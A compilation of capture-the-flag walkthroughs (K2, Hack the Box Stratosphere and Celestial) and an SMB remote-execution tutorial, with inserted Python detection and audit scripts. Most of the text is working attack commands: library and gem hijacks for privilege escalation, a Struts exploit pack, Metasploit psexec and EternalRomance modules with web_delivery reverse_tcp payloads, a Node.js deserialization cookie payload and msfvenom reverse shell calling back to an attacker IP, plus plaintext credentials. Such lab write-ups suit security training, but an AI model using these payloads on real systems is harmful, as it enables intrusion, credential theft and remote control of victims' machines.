Hack the /dev/random: K2 VM (boot2root)


Hello friends! Today we are going to take on another CTF challenge known as /dev/random: k2. The credit for making this VM goes to “Sagi-”, and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let us start by finding the IP of the VM (here it is 192.168.199.138, but you will have to find your own).
netdiscover



We use the given credentials to log in through SSH. After logging in we check the sudoers list and find that we can run /bin/calc as user “user2”.
ssh user@192.168.199.138
sudo -l




We use strace to debug the binary and see whether any files or dependencies are missing. We find that it looks for a shared object called libcalc.so in the /home/user/.config/ directory, and that the file does not exist.
strace /bin/calc 2>&1 | grep -i -E "open|access"




We check the /home directory and find that the user directory grants all permissions to its owner only. We give read and execute permission to the group and to others, then create a directory called .config so that we can place our shared object inside it.




We write a small C program that copies /bin/bash into the /tmp directory, gives the copy the SUID bit and runs it.




We save the file as libcalc.c, compile it into the missing shared object and run /bin/calc as user2. As soon as the application runs we check id and find that we have successfully spawned a shell as user2.
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
sudo -u user2 /bin/calc
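From the defender’s side, the strace output above is exactly what a review of a sudo-permitted binary should look at. The following Python script, an added example rather than code from the original post, parses open/access lines like the ones grepped for and flags any shared object searched outside the system library directories; the strace lines are constructed to mirror this box.

```python
import re

# Constructed strace output modelled on `strace /bin/calc 2>&1 | grep -E "open|access"`:
# the loader probes system paths, then looks for libcalc.so under a user's home directory.
SAMPLE_TRACE = """\
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/home/user/.config/libcalc.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/tmp/libhelper.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
"""

# Directories a privileged binary may legitimately load shared objects from.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")

# Matches: open("path", flags) = N  |  openat(AT_FDCWD, "path", flags) = N  |  access("path", mode) = N
LINE_RE = re.compile(r'^(open|openat|access)\((?:AT_FDCWD, )?"([^"]+)"[^)]*\)\s*=\s*(-?\d+)(?:\s+(\w+))?')
SHARED_OBJECT_RE = re.compile(r"\.so(\.\d+)*$")

def parse_trace(text):
    """Yield (syscall, path, result, errno_name) for every open/openat/access line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            syscall, path, result, errno_name = m.groups()
            yield syscall, path, int(result), errno_name

def find_hijackable_libs(text):
    """Shared-object lookups outside the trusted library directories.

    Each finding records whether the lookup failed with ENOENT: a missing library in a
    directory the loader will search is the worst case, because whoever can create the
    file there chooses the code the binary executes the next time it runs.
    """
    findings = []
    for _syscall, path, result, errno_name in parse_trace(text):
        if not SHARED_OBJECT_RE.search(path) or path.startswith(TRUSTED_LIB_DIRS):
            continue
        findings.append({"path": path, "missing": result < 0 and errno_name == "ENOENT"})
    return findings

if __name__ == "__main__":
    for f in find_hijackable_libs(SAMPLE_TRACE):
        state = "MISSING, creatable by whoever can write the directory" if f["missing"] else "present"
        print(f"untrusted library path: {f['path']} ({state})")
```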




After spawning a shell as user2 we enumerate the machine and find a cron job that runs a file called /sbin/bckup as user3.




We check the content of this file and find that it is a Ruby script that creates a zip file in the /tmp/ directory.




We check the zip library that this Ruby script uses and find that we can write to the file.



We replace the content of the file with a backtick command that copies /bin/bash to the /tmp/ directory as bash2 and sets the SUID bit on it.

echo '`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`' > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb


We wait for a while and go to the /tmp/ directory, where we find that bash2 has been created by user3. We run the new bash file and successfully spawn a shell as user3.



Since this gives us only the effective user ID and not the real user ID of user3, we write a C program that spawns a shell with user3’s UID and GID.



We compile the program and run it. After running it, we successfully spawn a shell with user3’s UID and GID.
gcc bash3.c -o bash3



Now we search for files with the SUID bit set and find a file called “whoisme” in the “/usr/local/bin/” directory.
find / -perm -4000 2>/dev/null


When we run the file it outputs the string “user”. When we check the binary with the strings command we find that it calls setuid, setgid and system, and runs the logname command.


We run it with an empty environment, using SHELLOPTS=xtrace and the PS4 variable so that the shell spawned by the binary copies /bin/bash into the /tmp/ directory as bash4, changes its ownership to root and sets the SUID bit; then we run the binary.

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)' /bin/sh -c '/usr/local/bin/whoisme'


As soon as we run the command we find our copied bash file. We run it and spawn a shell as root. We go to the root directory and find a file called flag.txt.


We take a look at the content of the file and find our congratulatory flag.


Hack the Box: Stratosphere Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Stratosphere”, which is a lab presented by Hack the Box and is available online for those who want to improve their skills in penetration testing and black-box testing. Stratosphere is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: find user.txt and root.txt file in victim’s machine.

Walkthrough

Since these labs are available online, they have static IPs. The IP of Stratosphere is 10.10.10.64.
Let’s start off by scanning the target.
nmap -sV 10.10.10.64




As per nmap, port 80 is open for HTTP, so let’s explore the target IP in the browser. On port 80 we were welcomed by the following page, where we didn’t find any informative clue.




We then visited port 8080 (HTTP proxy) and got the same web page. We inspected the source code of both port 80 and port 8080 but found nothing.




Next we decided to run a directory brute-force attack with the help of DirBuster, using the wordlist “directory-list-2.3-medium.txt”.




Luckily it fetched some web directories such as /Monitoring; let’s explore it in the web browser.




When we try to open the URL http://10.10.10.64:8080/Monitoring it redirects to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I took a close look at the .action extension in the URL and searched Google for information about it. I found that the .action extension is used by Apache Struts 2, which has a history of bugs and vulnerabilities; if you search for its exploits you will find plenty of Python scripts and exploits for compromising this service.




So we used an nmap script to check whether it is vulnerable.
nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
Awesome!!! It is vulnerable to CVE-2017-5638; let’s exploit it.




I found an exploit pack, Struts-Apache-ExploitPack; let’s download it from GitHub and make the script executable.
git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git
cd Struts-Apache-ExploitPack
cd Exploiter
ls
chmod 777 Exploit.sh




Now run the following command to exploit the victim machine.
./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action
id
ls
cat db_connect

Username: admin
Password: admin

So now we have database credentials; let’s use them to pull everything out of the database.




mysqldump -u admin -padmin --all-databases --skip-lock-tables
Here I found the password “9tc*rhKuG5TyXvUJOrE^5CK7k” for the user richard; now let’s try to connect over SSH with these credentials.




ssh richard@10.10.10.64
Yuppie, we successfully logged in to the victim’s machine, so now let’s get user.txt and root.txt.
ls
cat user.txt
cat test.py
Here we notice that test.py computes some hash values and at the end will hand out success.py from inside the root directory; the whole script depends on hashlib.




We also check the sudo rights for richard and find that he may run any Python script as root. So first we run test.py and start solving the hashes in order to get success.py.
sudo /usr/bin/python /home/richard/test.py




So we got the hash value; now we need to decode it, and after decoding I found “kayboo!”.




On submitting the decoded text it generated a new hash for the next step; again I decoded it and submitted the answer, and again a new hash appeared. It kept repeating the same process every time I submitted the decoded text.
Since test.py imports hashlib, a Python library, my last option was Python library hijacking to escalate to root.




Therefore I create a hashlib.py script in the current directory that calls the system binary ‘/bin/bash’; now when we run test.py it imports our hashlib.py, which calls /bin/bash.
echo 'import os;os.system("/bin/bash")' > hashlib.py
sudo /usr/bin/python /home/richard/test.py
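The root cause is that sudo runs test.py with the script’s own directory first on sys.path, so any module file the invoking user can write there shadows the standard library. The Python audit below, an added example that is not part of the original walkthrough, checks such a script before it is allowed in sudoers: it lists the modules the script imports and reports any that could be shadowed from a directory the sudoers user can write; it rebuilds the scenario in a temporary directory rather than touching /home/richard.

```python
import ast
import os
import stat
import tempfile

# Constructed stand-in for /home/richard/test.py: like the real one, it imports hashlib.
SAMPLE_SCRIPT = "import hashlib\nprint(hashlib.md5(b'x').hexdigest())\n"

def imported_names(script_path):
    """Top-level module names the script imports (first dotted component)."""
    with open(script_path) as fh:
        tree = ast.parse(fh.read(), script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def user_can_write(path, uid):
    """True if uid could modify path: it owns it, or a group/other write bit is set.
    Group membership is not resolved, so this errs on the side of reporting."""
    st = os.stat(path)
    return st.st_uid == uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sudo_script(script_path, invoking_uid):
    """Modules that `sudo python script_path` could import from a user-controlled place.

    Python puts the script's own directory at sys.path[0], ahead of the standard
    library, so a file named <module>.py there wins. A directory the sudoers user
    can write is therefore enough; an already-present shadow file is reported as such.
    """
    script_dir = os.path.dirname(os.path.abspath(script_path))
    findings = []
    for name in sorted(imported_names(script_path)):
        shadow = os.path.join(script_dir, name + ".py")
        if os.path.exists(shadow):
            findings.append((name, "shadowed by " + shadow))
        elif user_can_write(script_dir, invoking_uid):
            findings.append((name, "shadowable: %s is writable by uid %d" % (script_dir, invoking_uid)))
    return findings

def demo():
    """Rebuild the Stratosphere layout in a temp dir owned by the current user, who plays richard."""
    richard = os.getuid()
    with tempfile.TemporaryDirectory() as home:
        script = os.path.join(home, "test.py")
        with open(script, "w") as fh:
            fh.write(SAMPLE_SCRIPT)
        before = audit_sudo_script(script, richard)
        with open(os.path.join(home, "hashlib.py"), "w") as fh:
            fh.write("# constructed shadow module; a real one would run arbitrary code as root\n")
        after = audit_sudo_script(script, richard)
    return before, after

if __name__ == "__main__":
    for stage, findings in zip(("before shadow file", "after shadow file"), demo()):
        for name, why in findings:
            print(f"[{stage}] {name}: {why}")
```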
Boom!!! We own root; now let’s get the root.txt file and finish the task.


Multiple ways to Connect Remote PC using SMB Port

In this article we will learn how to connect to a victim’s machine via SMB port 445 once you have collected a username and password for the victim’s PC. To learn how to collect usernames and passwords from a remote host via the SMB protocol, click here, and to understand what the SMB protocol is, click here.

Table of contents
Exploiting Windows Server 2008 R2 via SMB through Metasploit built-in modules:
- Microsoft Windows Authenticated User Code Execution
- Microsoft Windows Authenticated Powershell Command Execution
- Microsoft Windows Authenticated Administration Utility
- SMB Impacket WMI Exec
Third-party tools:
- Impacket (psexec)
- Impacket (atexec)
- PsExec.exe
- Atelier Web Remote Commander
Exploiting Windows 2007 via SMB through Metasploit built-in exploits:
- MS17-010 EternalRomance SMB Remote Code Execution
- MS17-010 EternalRomance SMB Remote Command Execution

Let’s Begin
Tested on: Windows Server 2008 R2
Attacking Machine: Kali Linux

Microsoft Windows Authenticated User Code Execution
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit
Here,
rhost –> IP of victim PC
smbuser –> username
smbpass –> password
Once the commands run you will gain a meterpreter session on the victim’s PC and can access it as you want.


Microsoft Windows Authenticated Powershell Command Execution
This module uses a valid administrator username and password to execute a PowerShell payload using a technique similar to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the -EncodedCommand flag. Using this method, the payload is never written to disk, and since each payload is unique, it is less prone to signature-based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PowerShell execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the PowerShell payload has been reduced in size and wrapped in a PowerShell invocation which hides the window entirely.
 msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123
msf exploit(windows/smb/psexec_psh) > exploit

Once again, as the commands run you will gain a meterpreter session on the victim’s PC, and you can do as you wish.
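Both psexec and psexec_psh leave the same trace on the target: a network logon (event 4624, logon type 3) followed by a service install (event 7045) with a randomly chosen name, and for psexec_psh an image path carrying hidden, base64-encoded PowerShell. The detection below, an added example in Python rather than anything from the original article, runs these checks over constructed event records; the service names, image paths and timestamps are made up to mirror what the modules generate.

```python
import re

# Constructed Windows event records (fields as exported from the Security and System logs,
# times as plain seconds for simplicity). 7045 = service installed; 4624 type 3 = network logon.
SAMPLE_EVENTS = [
    {"time": 100, "id": 4624, "LogonType": 3, "IpAddress": "192.168.1.106", "TargetUserName": "administrator"},
    {"time": 103, "id": 7045, "ServiceName": "MqPVhGzuTkRl", "ImagePath": "%SYSTEMROOT%\\MqPVhGzuTkRl.exe"},
    {"time": 400, "id": 7045, "ServiceName": "Spooler", "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe"},
    {"time": 900, "id": 4624, "LogonType": 3, "IpAddress": "192.168.1.106", "TargetUserName": "administrator"},
    {"time": 902, "id": 7045, "ServiceName": "bXzQkWmTpLr",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e JABzAD0A...(constructed)"},
    {"time": 2000, "id": 7045, "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
]

ENCODED_PS_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

def looks_random(name):
    """Heuristic for generated service names: letters only, 8-16 long, with frequent
    case flips (MqPVhGzu...), unlike real names such as Spooler or wuauserv."""
    if not re.fullmatch(r"[A-Za-z]{8,16}", name):
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 4

def classify_service(ev):
    """Return why a 7045 event looks like SMB-based remote execution, or None."""
    name = ev.get("ServiceName", "")
    low = ev.get("ImagePath", "").lower()
    if "powershell" in low and ENCODED_PS_RE.search(low):
        return "service runs hidden encoded PowerShell (psexec_psh style)"
    if name.upper() == "PSEXESVC":
        return "Sysinternals PsExec service"
    if looks_random(name) and low.startswith("%systemroot%\\") and low.endswith(name.lower() + ".exe"):
        return "randomly named service binary in %SYSTEMROOT% (Metasploit psexec style)"
    return None

def detect(events, window=60):
    """Flag suspicious service installs and attach network logons seen within `window` seconds."""
    logons = [e for e in events if e["id"] == 4624 and e.get("LogonType") == 3]
    alerts = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        reason = classify_service(ev)
        if reason is None:
            continue
        sources = {l["IpAddress"] for l in logons if 0 <= ev["time"] - l["time"] <= window}
        alerts.append({"time": ev["time"], "service": ev["ServiceName"],
                       "reason": reason, "sources": sorted(sources)})
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"t={a['time']} service={a['service']}: {a['reason']}; network logons from {a['sources'] or 'none'}")
```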


Microsoft Windows Authenticated Administration Utility
This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a technique similar to the "psexec" utility provided by SysInternals. Daisy-chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine.
Thus, first, in a new Metasploit console we used the web_delivery module to obtain the malicious DLL command, which we can pass as the arbitrary command to run on the host.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text, which is the malicious DLL command.



msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.1.104
msf auxiliary(admin/smb/psexec_command) > set smbuser administrator
msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123
msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/psexec_command) > exploit



As soon as we run the psexec_command auxiliary module we get a meterpreter session as administrator.


SMB Impacket WMI Exec

This module takes an approach similar to psexec but executes commands through WMI.
msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) >
msf auxiliary(scanner/smb/impacket/wmiexec) >
msf auxiliary(scanner/smb/impacket/wmiexec) >
msf auxiliary(scanner/smb/impacket/wmiexec) >




Impacket: psexec.py
psexec.py lets you execute processes on remote Windows systems, copy files to them, process their output and stream it back. It allows execution of remote shell commands directly with a full interactive console, without having to install any client software.
Now let’s install the Impacket tools from GitHub (you can get them here). First clone the repository and install Impacket, then run psexec.py to connect to the victim’s machine.
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
cd examples
Syntax: ./psexec.py [[domain/]username[:password]@]<target IP address>
./psexec.py SERVER/Administrator:Ignite@192.168.1.104


Impacket: atexec.py
This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
Syntax: ./atexec.py [[domain/]username[:password]@]<target IP address> <command>
./atexec.py SERVER/Administrator:Ignite123@192.168.1.140 systeminfo
As you can see below, a remote connection was established to the server and the command systeminfo was run on the target, with its output delivered to the Kali terminal.


PsExec.exe
PsExec.exe is software that lets us access other computers on a network. It takes us straight to a shell on the remote PC without doing anything manually. Download it from http://download.sysinternals.com/files/PSTools.zip.
Unzip the file once you have downloaded it, go to your command prompt and type:
PsExec.exe \\192.168.1.104 -u administrator -p Ignite@123 cmd
Here,
192.168.1.104 –> is the IP of remote host
-u –> denotes username
-p –> denotes password
cmd –> to enter victim’s command prompt


Atelier Web Remote Commander
This is graphical software that lets us gain control of the victim’s PC quite easily.
Once you have opened the software, enter the IP address of the victim’s PC in the remote host box along with the username and password in their respective boxes, then click Connect; the victim’s whole screen will appear on your desktop and you will have a good view of what the victim is doing.




As you can observe, we have the victim’s screen in front of us.


MS17-010 EternalRomance SMB Remote code Execution
Tested on: Windows 2007 Ultimate
Attacking Machine: Kali Linux

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with an Administrator session. From there, the normal psexec payload code execution is done. It exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.105
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit



MS17-010 EternalRomance SMB Remote Command Execution
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with an Administrator session. From there, the normal psexec command execution is done. It exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.
Thus, first, in a new Metasploit console we used the web_delivery module to obtain the malicious DLL command, which we can pass as the arbitrary command to run on the host.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text, which is the malicious DLL command.


msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.1.105
msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj
msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/ms17_010_command) > exploit



As soon as we run the ms17_010_command auxiliary module we get a meterpreter session as administrator.
In this way we can compromise a victim’s machine remotely if we have login credentials.
Happy Hacking!!!!


Hack the Box: Celestial Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Celestial”, which is a lab presented by Hack the Box and is available online for those who want to improve their skills in penetration testing and black-box testing. Celestial is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.
Walkthrough
Since these labs are available online, they have static IPs. The IP of Celestial is 10.10.10.85.
Let’s start off by scanning the target.
nmap -A 10.10.10.85




The nmap output shows that TCP port 3000 is open on the target machine. Let’s try to access the website on this non-standard HTTP port (3000):
Browse to http://10.10.10.85:3000 and we are greeted with the following page.




As we didn’t find any other clue to move forward after trying many other possibilities, we moved on to examining the website’s requests with Burp Suite. Upon capturing the web page’s GET request, we noticed the profile= cookie parameter (highlighted in red).




Copy the entire value of the profile= cookie parameter and paste it into the Burp Suite decoder.
eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D
URL-decoding it gives base64; decoding the base64 in turn shows the result in clear text. The output displays the username and other details of a specific user. This indicates that we can insert our own code into the profile cookie value to get the desired results.




On further investigation we learned that this is a Node.js deserialization bug that allows remote code execution. Further details are given on the website below. Reading the entire page, we observe a function that contains a particular string made up of multiple numeric values.




Copy the entire numeric content (after String.fromCharCode), starting from 10 and ending at 10. Navigate to https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html and convert decimal to ASCII as shown in the screenshot below.




Now change the ASCII text, replacing the HOST and PORT values with HOST=10.10.14.3 and PORT=4444, where 10.10.14.3 is our Kali machine’s IP. Once done, we get the equivalent output in decimal format as shown below.




Copy the decimal output from the screenshot above, starting from 118 and ending with 10, with each number separated by a comma.
Note: since the decimal output above is separated by spaces, we need to either add the commas manually or use a short Python script to insert them before proceeding.
Once the comma-separated decimal output is ready, paste it into the code shown below (replacing value with the decimal output) and base64-encode it (the JSON must be single-quoted, otherwise the shell expands the $$ in the marker):
echo '{"username":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(value)) }()"}' | base64 -w0
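What makes this cookie dangerous is the node-serialize convention the walkthrough relies on: a string value beginning with _$$ND_FUNC$$_ is turned back into a function, and a trailing () makes it run during unserialize(). The Python check below, an added example and not part of the original post, decodes the captured cookie and a constructed hostile one and reports the markers a server-side filter or log review should reject; the harmless character codes in the constructed cookie are the example’s own assumption.

```python
import base64
import json
import re
from urllib.parse import unquote

# The profile cookie captured in the walkthrough, exactly as the browser sends it
# (base64, then URL-encoded, hence the trailing %3D%3D).
PROFILE_COOKIE = ("eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIs"
                  "ImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D")

# A constructed hostile cookie built from the template in the walkthrough. The character
# codes spell only "var", so it is harmless, but it carries every marker we check for.
MALICIOUS_COOKIE = base64.b64encode(
    b'{"username":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(118,97,114)) }()"}'
).decode()

# node-serialize stores functions as strings with this prefix and re-creates them with
# eval() on unserialize(); a trailing "()" turns the value into an IIFE that runs at once.
ND_FUNC_MARKER = "_$$ND_FUNC$$_"
IIFE_RE = re.compile(r"function\s*\([^)]*\)\s*\{.*\}\s*\(\s*\)", re.S)
PRIMITIVES_RE = re.compile(r"String\.fromCharCode|child_process|require\s*\(|eval\s*\(")

def decode_profile(cookie):
    """URL-decode, base64-decode and JSON-parse the cookie. Returns (object or None, raw text)."""
    raw = base64.b64decode(unquote(cookie)).decode("utf-8", "replace")
    try:
        return json.loads(raw), raw
    except json.JSONDecodeError:
        return None, raw

def assess_profile(cookie):
    """Reasons to reject the cookie before it reaches unserialize(); empty means it looks benign."""
    obj, raw = decode_profile(cookie)
    reasons = []
    if ND_FUNC_MARKER in raw:
        reasons.append("serialized-function marker present")
    if IIFE_RE.search(raw):
        reasons.append("immediately-invoked function in payload")
    if PRIMITIVES_RE.search(raw):
        reasons.append("code-execution primitives in payload")
    if not isinstance(obj, dict):
        reasons.append("not a JSON object")
    elif not all(isinstance(v, str) for v in obj.values()):
        reasons.append("non-string profile field")
    return reasons

if __name__ == "__main__":
    for label, cookie in (("captured", PROFILE_COOKIE), ("constructed", MALICIOUS_COOKIE)):
        obj, _ = decode_profile(cookie)
        print(label, "->", obj, "| reject:", assess_profile(cookie) or "no")
```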




Copy the encoded output and paste it as the value of the profile= cookie in Burp Suite as shown in the image below.




Once done, click Forward in the Burp Suite Intercept tab.
Note: before forwarding the modified request in Burp Suite, we should set up the netcat listener on the Kali machine and keep it ready.
nc -lvp 4444
To get a proper TTY shell we spawn one with a Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'

Hurray!! We got a reverse shell on the target machine.
Let’s have a quick look at the contents.
ls
We navigated through many folders and found interesting stuff in the Documents folder.
cd Documents
Here we can see a user.txt file; let’s read its contents.
cat user.txt
Finally, we got our first flag, the contents of user.txt.




On further navigation we also opened script.py out of curiosity to examine its contents. Running cat script.py shows only a print "Script is running.." statement.

cat script.py
print "Script is running.."

Note: this is an indication that we may need to examine the log files to see which script is running and whether it runs periodically.

The best step forward is to examine the contents of the log directory under /var.

cd /var/log

Let’s see the files listed here

ls

As we can see, multiple syslog files are generated in this folder. Old logs are zipped and numbered accordingly; the latest log is always the file named syslog. So we open the syslog file and look for anything interesting.

cat syslog
We notice a cron job running every 5 minutes that copies the output of script.py (in /home/sun/Documents) to output.txt.
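This cron job and the one on the /dev/random: K2 box fail in the same way: a scheduled task running as a more privileged user executes or loads a file (script.py here, the rubyzip zip.rb there) that a less privileged user can modify or replace. The Python audit below, an added example that belongs to neither walkthrough, walks such a path and its parent directories and reports every component that is not owned by the job’s trusted uids or carries group/other write bits; it builds both layouts in a temporary directory with constructed files.

```python
import os
import stat
import tempfile

def weak_points(path, trusted_uids, stop_at="/"):
    """(component, reason) pairs for each part of path, from the file up to but not
    including stop_at, that a user outside trusted_uids could change: the file itself,
    or a parent directory in which it could be renamed or replaced.

    Group/other write bits count as writable (group membership is not resolved, so this
    errs on the side of reporting). A sticky directory owned by a trusted uid lets only an
    entry's owner rename it, so it is treated as safe here.
    """
    findings = []
    component = os.path.abspath(path)
    stop_at = os.path.abspath(stop_at)
    while component != stop_at:
        try:
            st = os.stat(component)
        except FileNotFoundError:
            findings.append((component, "missing: whoever can create it controls it"))
        else:
            group_other_w = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
            sticky_dir = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
            if st.st_uid not in trusted_uids:
                findings.append((component, f"owned by uid {st.st_uid}, which the job should not trust"))
            elif group_other_w and not sticky_dir:
                findings.append((component, "group/other write bit set"))
        parent = os.path.dirname(component)
        if parent == component:  # reached "/" without meeting stop_at
            break
        component = parent
    return findings

def demo():
    """Constructed layouts for both cases, built in a temp dir; returns (celestial, k2) findings."""
    me = os.getuid()
    old_umask = os.umask(0o022)  # make directory modes deterministic
    try:
        with tempfile.TemporaryDirectory() as top:
            # Celestial: root's cron copies /home/sun/Documents/script.py, which sun owns.
            docs = os.path.join(top, "home", "sun", "Documents")
            os.makedirs(docs)
            script = os.path.join(docs, "script.py")
            open(script, "w").close()
            os.chmod(script, 0o644)
            # K2: user3's cron runs a Ruby script whose zip.rb library is mode 0666.
            lib = os.path.join(top, "gems", "rubyzip", "lib")
            os.makedirs(lib)
            zip_rb = os.path.join(lib, "zip.rb")
            open(zip_rb, "w").close()
            os.chmod(zip_rb, 0o666)
            # The current user plays sun, so the trusted root uid is modelled as any other
            # uid (in real use pass (0, job_uid)). Ownership alone flags the whole chain.
            celestial = weak_points(script, trusted_uids=(me + 1,), stop_at=top)
            # Here the current user owns the gem tree and plays user3; only the mode bits matter.
            k2 = weak_points(zip_rb, trusted_uids=(me,), stop_at=top)
    finally:
        os.umask(old_umask)
    return celestial, k2

if __name__ == "__main__":
    for label, findings in zip(("celestial", "k2"), demo()):
        for component, reason in findings:
            print(f"[{label}] {component}: {reason}")
```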




Now we can put our own content into script.py. For this, let’s generate a reverse shell with the following command:
msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=1234 R
Copy the msfvenom output and save it on the Kali desktop as script.py; it will be used in the subsequent steps.




Now run a web server on the Kali machine

python -m SimpleHTTPServer 80



Let’s read the contents of script.py on the target; the output is print "Script is running.."
cat script.py

Let’s move the original script aside by renaming it to script.py.original as shown below
mv script.py script.py.original

Download our newly created script.py from the Kali machine
wget http://10.10.14.3/script.py


Start a netcat listener for the reverse shell
nc -lvp 1234
To get a proper TTY shell we spawn one with a Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'

Hurray!! We got root.
Navigate to the root directory
cd /root
Let’s see what it contains.

ls

As we can see, it contains two files, root.txt and script.py. Let’s open root.txt.
cat root.txt



Wonderful!! We have gained access to both user.txt and root.txt and hacked this box.